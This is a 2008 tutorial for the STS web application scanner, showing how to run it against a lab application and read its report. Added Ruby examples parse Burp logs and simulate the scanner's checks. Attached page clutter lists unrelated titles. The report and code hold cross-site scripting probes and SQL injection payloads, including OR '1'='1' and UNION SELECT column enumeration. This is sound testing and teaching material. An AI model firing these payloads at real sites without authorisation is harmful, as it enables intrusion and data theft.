STS Scanner Tutorial

             By Jordan Del-Grande




Copyright © 2008 by Security Technology Science Pty Ltd
            www.securitytechscience.com
                                                          Page 1 of 13
Table of Contents
STS Scanner Tutorial.....................................................................................................1
  Preamble...................................................................................................................3
  Introduction..............................................................................................................3
  Installation................................................................................................................3
  The Assessment........................................................................................................4
     Reconnaissance ....................................................................................................4
     Enumeration..........................................................................................................7
     Testing..................................................................................................................7
     Reviewing the Results...........................................................................................8
  Future Improvements................................................................................................9
Appendix A: STS-Scanner Report...............................................................................10
Company Details..........................................................................................................13
  About the Author....................................................................................................13
  Contact Information................................................................................................13




Preamble
This paper is a how-to on the correct usage of the STS Scanner. The tool is freely available
for download at http://www.securitytechscience.com/resources/. The information is made
available to educate testers on how to discover the classes of vulnerability the scanner
reports (SQL injection, cross-site scripting and directory listings) and developers on how
to avoid writing applications that contain them.

All techniques in this paper were performed within the confines of the Security Technology
Science Testing Lab. Only test on applications that are either under your direct ownership or
you have written legal authorisation to test.

Introduction
The STS Scanner is specifically a web application scanner. It is not designed to replace the
penetration tester or the penetration test. It is a tool that should assist the penetration tester in
performing a vulnerability assessment/penetration test and hence is only one step of many in
the process.

With that said, the paper is organised in much the same fashion as the high level steps in a
penetration test. It should not be mistaken that this is the be all and end all of the penetration
test. The other sections of a penetration test have been excluded in order to focus primarily
on how to use the STS Scanner. For a comprehensive guide on performing a penetration test
see OWASP http://www.owasp.org/index.php/Category:OWASP_Testing_Project.

Installation
Step 1: Install Ruby
The STS Scanner has been completely written using the Ruby programming language.
Information on how to download and install Ruby can be found at http://www.ruby-
lang.org/en/downloads/.

Step 2: Install RubyGems
Note: For those using Windows, you can skip this step if you used the Ruby One-Click
Installer.

One RubyGems library is needed, so RubyGems itself must be installed. Information on how
to download and install RubyGems can be found at http://rubygems.org/.

Step 3: Install Hpricot
Hpricot is a RubyGems library used for parsing HTML pages. Run the following from the
command line as a privileged user:
gem install hpricot --remote
(--remote is the default for gem install, so the flag can be omitted. Hpricot has not been
maintained for many years and may not build against a current Ruby.)
Step 4: Run STS Scanner
To test that the installation was a success, run the STS Scanner from the command line.




Step 5: Check out the STS Scanner Options
Run ruby sts-scanner.rb --help




The Assessment
Now that some background contextual information has been provided and you have installed
the necessary components, let's begin by performing a web application scan on the Security
Technology Science vulnerable web application, “OnlineBusiness”.

Three separate scans will be run so that as much of the application's attack surface as
possible is discovered. The scans can be categorised as follows:

    1. Reconnaissance Scan (Blind Scan) – Spider the site then scan
    2. Unauthenticated Scan – Manually crawl the site then scan
    3. Authenticated Scan – Manually crawl the site as an authenticated user then scan

Reconnaissance
As this is a black box assessment, the only information provided to us is the URL of the
application to be tested: http://onlinebusiness.com.au/. Browsing to the site we see the
following page.




Figure 1.0 – OnlineBusiness Home Page

At present we have gathered enough information to perform a reconnaissance/blind scan. We
have the URL, and we can see that the application runs over plain HTTP on port 80.

We can kick off the sts-scanner to first spider the application and then perform the
appropriate tests by running the following command:
ruby sts-scanner.rb http://onlinebusiness.com.au
Starting the Web Crawler...
.
.
Web Crawler Complete!
Starting Application Scan => http://onlinebusiness.com.au
..
ALERT: Directory Listing Detected => GET /images/
.....
ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php
.....................
Application Scan Complete!
Compiling results...Done!




We will continue the reconnaissance to make sure that as much of the application's attack
surface as possible is discovered. The spider cannot yet follow everything a browser can,
for example links generated by JavaScript or requests made by Ajax code. So we will launch
Burp Suite and manually crawl the application, logging all requests to a local file.

Firstly, configure your browser to proxy all requests to the local machine on port 8080
(Burp's default listener).




                                   Figure 1.1 – Set up proxy

Next, configure Burp Proxy to log all requests to a local file, 'onlinebusiness.burp'.




                            Figure 1.2 – Logging all requests locally

Finally, test that a request is passed through the Burp Proxy and begin the crawl of the entire
application.




                              Figure 1.3 – Burp Proxy Request


Enumeration
After crawling the website we notice there is a 'Login' page, so we can assume there is a
section of this application that requires authentication, and the appropriate level of
authorisation, to be viewed. Leveraging the techniques in the "Application Username
Enumeration" whitepaper found at http://www.securitytechscience.com/resources/, we discover
a valid username of '10006' with the password 'password', and that the application uses a
cookie to track user sessions.

We now use these credentials to log into the application, create a new Burp log file called
'onlinebusiness-authenticated.burp' and perform the crawl again. Note: we are careful not to
click on any logout or change-password links, because the scanner replays every logged
request and a replayed logout or password change would invalidate the session part-way
through the scan.

Testing
We can now begin the unauthenticated scan of the application. It is simply a matter of
giving the sts-scanner the location of the Burp log file:
ruby sts-scanner.rb --log onlinebusiness.burp http://onlinebusiness.com.au
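In --log mode the scanner turns the Burp log into the attack surface it prints at the end of its report (the "Attack Surfaces" section in Appendix A). The following Ruby is an added example of that step, not the STS Scanner's own code: it reads a constructed log, extracts each raw request, and builds the same four lists (client headers, GET/POST parameters, directories, files). The log layout, the sample requests and the helper names are assumptions made for this example; compare the separators with the file your Burp version actually writes.

```ruby
require 'uri'

# A constructed sample in the shape of an old Burp Proxy request log: each entry
# is a line of '=' characters, a header line with the time, target and client
# IP, another '=' line, then the raw HTTP request. The layout is assumed for
# this example, not copied from a real Burp log.
SAMPLE_LOG = <<~LOG
  ======================================================
  10:41:02  http://onlinebusiness.com.au:80  [192.0.2.10]
  ======================================================
  GET /contacts.php HTTP/1.1
  Host: onlinebusiness.com.au
  User-Agent: Mozilla/5.0
  Cookie: sessionid=123456

  ======================================================
  10:41:09  http://onlinebusiness.com.au:80  [192.0.2.10]
  ======================================================
  POST /contacts.php HTTP/1.1
  Host: onlinebusiness.com.au
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 13

  postcode=2000
  ======================================================
  10:41:15  http://onlinebusiness.com.au:80  [192.0.2.10]
  ======================================================
  GET /images/glasses.jpg HTTP/1.1
  Host: onlinebusiness.com.au
  Referer: http://onlinebusiness.com.au/login.php

  ======================================================
  10:41:21  http://onlinebusiness.com.au:80  [192.0.2.10]
  ======================================================
  GET /login.php?msg=Username%20does%20not%20exist HTTP/1.1
  Host: onlinebusiness.com.au

  ======================================================
LOG

# Split the log into raw requests: '=' separator lines delimit entries, and the
# time/target header lines are dropped, leaving only the HTTP requests.
def raw_requests(log)
  log.split(/^=+\r?\n/).map(&:strip).reject(&:empty?)
     .reject { |chunk| chunk.match?(/\A\d{1,2}:\d{2}:\d{2}\s+http/) }
end

# Parse one raw request into method, path, parameter names and header names.
# Query-string parameters count for any method; body parameters only for POST.
def parse_request(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  request_line, *header_lines = head.lines.map(&:chomp)
  method, target, _version = request_line.split(' ', 3)
  uri = URI.parse(target)
  params = URI.decode_www_form(uri.query.to_s).map(&:first)
  params |= URI.decode_www_form(body.strip).map(&:first) if method == 'POST' && body
  headers = header_lines.map { |l| l.split(':', 2).first.strip.downcase }
  { method: method, path: uri.path, params: params, headers: headers }
end

# The three client headers the report lists under "HTTP Client Header".
CLIENT_HEADERS = %w[cookie referer user-agent]

# Build the four lists the report prints under "Attack Surfaces", using the
# report's own "METHOD /path+param1+param2" notation for parameters.
def attack_surface(log)
  reqs = raw_requests(log).map { |r| parse_request(r) }
  params = reqs.select { |r| r[:params].any? }
               .map { |r| "#{r[:method]} #{r[:path]}+#{r[:params].join('+')}" }
  headers = reqs.flat_map { |r| r[:headers] } & CLIENT_HEADERS
  files = reqs.map { |r| r[:path] }.reject { |p| p.end_with?('/') }
  dirs = reqs.map { |r| File.dirname(r[:path]) }.map { |d| d.end_with?('/') ? d : "#{d}/" }
  { headers: headers.sort, params: params.uniq.sort,
    directories: dirs.uniq.sort, files: files.uniq.sort }
end

if __FILE__ == $0
  attack_surface(SAMPLE_LOG).each do |section, entries|
    puts "== #{section} =="
    entries.each { |e| puts e }
  end
end
```

Only the names of parameters and headers are kept, not their values, because the attack surface is the set of injection points; the values the crawl recorded are replaced by payloads during the scan. A request seen once is enough to register its parameters, which is why the manual crawl matters more for coverage than for volume.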

Next we need to perform the authenticated scan of the application. As we now know the
application uses a cookie to track user sessions, we use Burp Proxy to capture the session
cookie. Log into the application, make sure the 'intercept is on' button is enabled within
Burp Proxy, then click on any link or refresh the current page and look for the session
cookie in the intercepted request.




Figure 1.4 – Session Cookie

Using the session cookie identified, and while still logged into the application (the cookie
is only useful while the server-side session is alive), we can now perform the authenticated
scan, where sessionid=123456 is the cookie captured in Figure 1.4:
ruby sts-scanner.rb --log onlinebusiness-authenticated.burp --cookie "sessionid=123456" http://onlinebusiness.com.au

Reviewing the Results
After every scan is complete, the sts-scanner produces several different files. They are:

    1. spider.log – log of all the spider's requests and responses
    2. scanner.log – log of all the scanner's requests and responses
    3. date-time-host.txt – text file of the attack surface and the vulnerabilities
       discovered

Note: For the sake of brevity we are only going to focus on the last file. The complete file is
located in Appendix A.

Section 1: Target
This section contains the target host the scanner tested. That is, http://onlinebusiness.com.au

** STS Web Application Scanner **
Target => http://onlinebusiness.com.au

Section 2: Crawl
This section contains the surface area the spider was able to identify.

** Crawling Target Site **

GET /

GET /images/glasses.jpg

GET /images/english.gif

GET /contacts.php

POST /contacts.php?postcode=
...

Section 3: Vulnerabilities
This section lists the vulnerabilities identified by the scan. Reading from top to bottom
there is a directory listing, two cross-site scripting holes in /contacts.php (one via the
User-Agent header, one via the postcode parameter) and one confirmed SQL injection in the
postcode parameter. For the SQL injection the scanner worked in stages: the te'st probe
produced a MySQL error message, the 1 OR '1'='1' payload was flagged as a possible injection,
ORDER BY was stepped up until ORDER BY 6 failed (so the query returns 5 columns), a UNION of
5 nulls against information_schema.TABLES confirmed the DBMS as MySQL, and a UNION of 5
string literals showed that all 5 columns accept string (varchar) values.

** Starting Application Scan **

ALERT: Directory Listing Detected => GET /images/

ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php
user-agent: "><script>alert('Vulnerable');</script>

ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode="><script>alert('Vulnerable');</script>

ALERT: MySQL Database Error Message Detected => POST /contacts.php?postcode=te'st

ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR%20'1'%3D'1'--

ALERT: Enumerated column number blind: 5 => POST /contacts.php?postcode=1%20ORDER%20BY%206--

ALERT: Verified database type blind: mysql => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM%20information_schema.TABLES--

ALERT: Enumerated data types blind => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20'b','b','b','b','b'%20FROM%20information_schema.TABLES--
...
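The alerts above are the scanner's checks in the order it runs them. To make that logic concrete, here is an added example in Ruby, not the STS Scanner's own code and not the OnlineBusiness application, that runs three of those checks against a simulated contacts.php: the reflected-XSS marker (via the postcode parameter and the User-Agent header), the te'st error probe, and the blind ORDER BY column count. One version of the handler reflects input verbatim and concatenates SQL; the hardened version encodes what it reflects and validates the postcode before it reaches the query. The MySQL error strings are real, but the fake_mysql stand-in, its five-column table and the handler names are constructed for this example.

```ruby
require 'erb'

# --- Simulated target (constructed for this example) -----------------------
# A stand-in for the tutorial's contacts.php so the checks can run offline.
# The column count is the hidden fact the scanner has to discover.
CONTACTS_COLUMNS   = 5
MYSQL_SYNTAX_ERROR = "You have an error in your SQL syntax; check the manual " \
                     "that corresponds to your MySQL server version"

# Not a SQL engine: it only imitates the two MySQL error conditions the
# report relies on (an unbalanced quote, and ORDER BY past the last column).
def fake_mysql(sql)
  return MYSQL_SYNTAX_ERROR if sql.count("'").odd?
  m = sql.match(/ORDER BY (\d+)/i)
  return "Unknown column '#{m[1]}' in 'order clause'" if m && m[1].to_i > CONTACTS_COLUMNS
  "<tr><td>Acme Pty Ltd</td></tr>"
end

# Vulnerable handler: reflects postcode and User-Agent verbatim, concatenates SQL.
def vulnerable_contacts(postcode, user_agent)
  rows = fake_mysql("SELECT * FROM contacts WHERE postcode = #{postcode}")
  "<html><p>Results for #{postcode} (browser: #{user_agent})</p>#{rows}</html>"
end

# Hardened handler: HTML-encodes everything it reflects and only lets a numeric
# postcode reach the query (in real code a prepared statement does this job).
def hardened_contacts(postcode, user_agent)
  safe_pc = postcode.to_s.match?(/\A\d{1,4}\z/) ? postcode.to_s : "0"
  rows = fake_mysql("SELECT * FROM contacts WHERE postcode = #{safe_pc}")
  "<html><p>Results for #{ERB::Util.html_escape(postcode.to_s)} " \
  "(browser: #{ERB::Util.html_escape(user_agent.to_s)})</p>#{rows}</html>"
end

# --- Scanner checks, mirroring the report's probes -------------------------
XSS_PAYLOAD    = %q{"><script>alert('Vulnerable');</script>}
BENIGN_UA      = "Mozilla/5.0"
MYSQL_ERROR_RE = /You have an error in your SQL syntax|Unknown column '\d+' in 'order clause'/

# XSS: the marker must come back byte-for-byte; an entity-encoded copy is safe.
def xss_reflected?(handler, via)
  body = via == :postcode ? handler.call(XSS_PAYLOAD, BENIGN_UA) : handler.call("2000", XSS_PAYLOAD)
  body.include?(XSS_PAYLOAD)
end

# Error-based SQL injection indicator: the report's te'st probe.
def mysql_error?(handler)
  MYSQL_ERROR_RE.match?(handler.call("te'st", BENIGN_UA))
end

# Blind column enumeration: ORDER BY n succeeds while n <= column count and
# errors beyond it, so the first failing n minus one is the width of the SELECT.
def enumerate_columns(handler, max = 20)
  (1..max).each do |n|
    return n - 1 if MYSQL_ERROR_RE.match?(handler.call("1 ORDER BY #{n}--", BENIGN_UA))
  end
  nil # no error within the limit: inconclusive, so report nothing
end

def scan(handler)
  {
    xss_postcode:   xss_reflected?(handler, :postcode),
    xss_user_agent: xss_reflected?(handler, :user_agent),
    mysql_error:    mysql_error?(handler),
    columns:        enumerate_columns(handler),
  }
end

if __FILE__ == $0
  puts "vulnerable: #{scan(method(:vulnerable_contacts))}"
  puts "hardened:   #{scan(method(:hardened_contacts))}"
end
```

The ORDER BY probe counts upward from 1 until the database complains, so the report's "ORDER BY 6" alert is exactly the first failing probe for a 5-column query. Two caveats a real scanner has to handle: a cap on the count, so a non-injectable parameter does not turn into an endless loop, and an error on ORDER BY 1 itself, which means the injection point is not in a position where ORDER BY can be appended and the technique does not apply.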



Future Improvements
The STS Scanner uses Mechanize and Hpricot to parse and spider HTML pages. These libraries
are not able to parse and identify JavaScript and/or Ajax code. A separate version of the
STS Scanner is to be developed in which the internal core does not rely on these libraries,
making them obsolete. The core will behave more like an everyday browser (i.e., IE, Firefox,
etc.) so that it can hopefully branch out into other application types such as Flash and
web services.

The testing modules are currently limited to three types of test (SQL injection, XSS
injection and directory indexing). These are to be expanded to incorporate more injection
tests such as CSRF, code execution, HTTP response splitting, etc.

The reporting functionality is to be updated to produce pdf files containing clickable links,
statistics and graphs.


Appendix A: STS-Scanner Report

** STS Web Application Scanner **
Target => http://onlinebusiness.com.au

** Crawling Target Site **
GET /
GET /images/glasses.jpg
GET /images/english.gif
GET /images/french.gif
GET /images/russian.gif
GET /contacts.php
POST /contacts.php?postcode=
GET /database/contacts.txt
GET /login.php
POST /login.php?login=&password=
GET /login.php?msg='Username%20does%20not%20exist'
POST /login.php?login=&password=
GET /logininformation.php
GET /products.php
POST /products.php?name=&description=&type=Stock
GET /index.php

** Crawling Complete **

** Starting Application Scan **
ALERT: Directory Listing Detected => GET /images/

ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php
user-agent: "><script>alert('Vulnerable');</script>

ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode="><script>alert('Vulnerable');</script>

ALERT: MySQL Database Error Message Detected => POST /contacts.php?postcode=te'st

ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR%20'1'%3D'1'--

ALERT: Enumerated column number blind: 5 => POST /contacts.php?postcode=1%20ORDER%20BY%206--

ALERT: Verified database type blind: mysql => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM%20information_schema.TABLES--

ALERT: Enumerated data types blind => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20'b','b','b','b','b'%20FROM%20information_schema.TABLES--

ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode=
user-agent: "><script>alert('Vulnerable');</script>

ALERT: Directory Listing Detected => GET /database/

ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /login.php?msg="><script>alert('Vulnerable');</script>

ALERT: MySQL Database Error Message Detected => POST /products.php?name=te'st&description=&type=Stock

ALERT: Possible SQL Injection Exploit => POST /products.php?name=1'%20OR%20'1'%3D'1&description=&type=Stock

ALERT: Verified Database Type: mysql => POST /products.php?name=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH%20where%20'1'%3D'1&description=&type=Stock

ALERT: Column Enumeration Successful: 3 => POST /products.php?name=1'%20UNION%20ALL%20select%20null,null,null%20from%20information_schema.TABLES%20where%20'1'%3D'1&description=&type=Stock

ALERT: Enumerated data types => POST /products.php?name=1'%20UNION%20ALL%20select%20'b','b','b'%20from%20information_schema.TABLES%20where%20'1'%3D'1&description=&type=Stock

ALERT: MySQL Database Error Message Detected => POST /products.php?name=&description=te'st&type=Stock

ALERT: Possible SQL Injection Exploit => POST /products.php?name=&description=1'%20OR%20'1'%3D'1&type=Stock

ALERT: Verified Database Type: mysql => POST /products.php?name=&description=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH%20where%20'1'%3D'1&type=Stock

ALERT: Column Enumeration Successful: 3 => POST /products.php?name=&description=1'%20UNION%20ALL%20select%20null,null,null%20from%20information_schema.TABLES%20where%20'1'%3D'1&type=Stock

ALERT: Enumerated data types => POST /products.php?name=&description=1'%20UNION%20ALL%20select%20'b','b','b'%20from%20information_schema.TABLES%20where%20'1'%3D'1&type=Stock

** Scan Finished **

** Attack Surfaces **

== Parameter Attack Surface ==

= HTTP Client Header =
cookie
referer
user-agent

= GET/POST Parameter =
GET /login.php+msg
POST /contacts.php+postcode
POST /login.php+login+password
POST /products.php+name+description+type

== Directory Attack Surface ==
GET /
GET /database/
GET /images/

== File Attack Surface ==
GET /contacts.php
GET /database/contacts.txt
GET /index.php
GET /login.php
GET /logininformation.php
GET /products.php

** End of Attack Surface **




Company Details

About the Author
Jordan Del-Grande, Director and Principal Consultant at Security Technology Science, has
several years of successful management and consulting experience performing Information
Security and Risk Management services in predominantly financial organisations. Prior to
Security Technology Science, he spent several years as a consultant with Ernst & Young and
the Advanced Security Center.

Contact Information

   Company Name:                 Security Technology Science Pty Ltd
   Email:                        info@securitytechscience.com
   Web Site:                     www.securitytechscience.com




AppSec California 2016 - Making Security Agile
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
 
Web Application Finger Printing - Methods/Techniques and Prevention
Web Application Finger Printing - Methods/Techniques and PreventionWeb Application Finger Printing - Methods/Techniques and Prevention
Web Application Finger Printing - Methods/Techniques and Prevention
 
Securing web applications
Securing web applicationsSecuring web applications
Securing web applications
 
2016 Guide to User Data Security
2016 Guide to User Data Security2016 Guide to User Data Security
2016 Guide to User Data Security
 
B&W Netsparker overview
B&W Netsparker overviewB&W Netsparker overview
B&W Netsparker overview
 

Mehr von tutorialsruby

&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />tutorialsruby
 
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>tutorialsruby
 
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>tutorialsruby
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />tutorialsruby
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />tutorialsruby
 
Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0tutorialsruby
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269tutorialsruby
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269tutorialsruby
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008tutorialsruby
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008tutorialsruby
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheetstutorialsruby
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheetstutorialsruby
 

Mehr von tutorialsruby (20)

&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
TopStyle Help &amp; &lt;b>Tutorial&lt;/b>
 
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
The Art Institute of Atlanta IMD 210 Fundamentals of Scripting &lt;b>...&lt;/b>
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0Standardization and Knowledge Transfer – INS0
Standardization and Knowledge Transfer – INS0
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
 
xhtml-documentation
xhtml-documentationxhtml-documentation
xhtml-documentation
 
xhtml-documentation
xhtml-documentationxhtml-documentation
xhtml-documentation
 
CSS
CSSCSS
CSS
 
CSS
CSSCSS
CSS
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
 
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa0602690047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
0047ecaa6ea3e9ac0a13a2fe96f4de3bfd515c88f5d90c1fae79b956363d7f02c7fa060269
 
HowTo_CSS
HowTo_CSSHowTo_CSS
HowTo_CSS
 
HowTo_CSS
HowTo_CSSHowTo_CSS
HowTo_CSS
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008
 
BloggingWithStyle_2008
BloggingWithStyle_2008BloggingWithStyle_2008
BloggingWithStyle_2008
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheets
 
cascadingstylesheets
cascadingstylesheetscascadingstylesheets
cascadingstylesheets
 

Kürzlich hochgeladen

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 

Kürzlich hochgeladen (20)

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
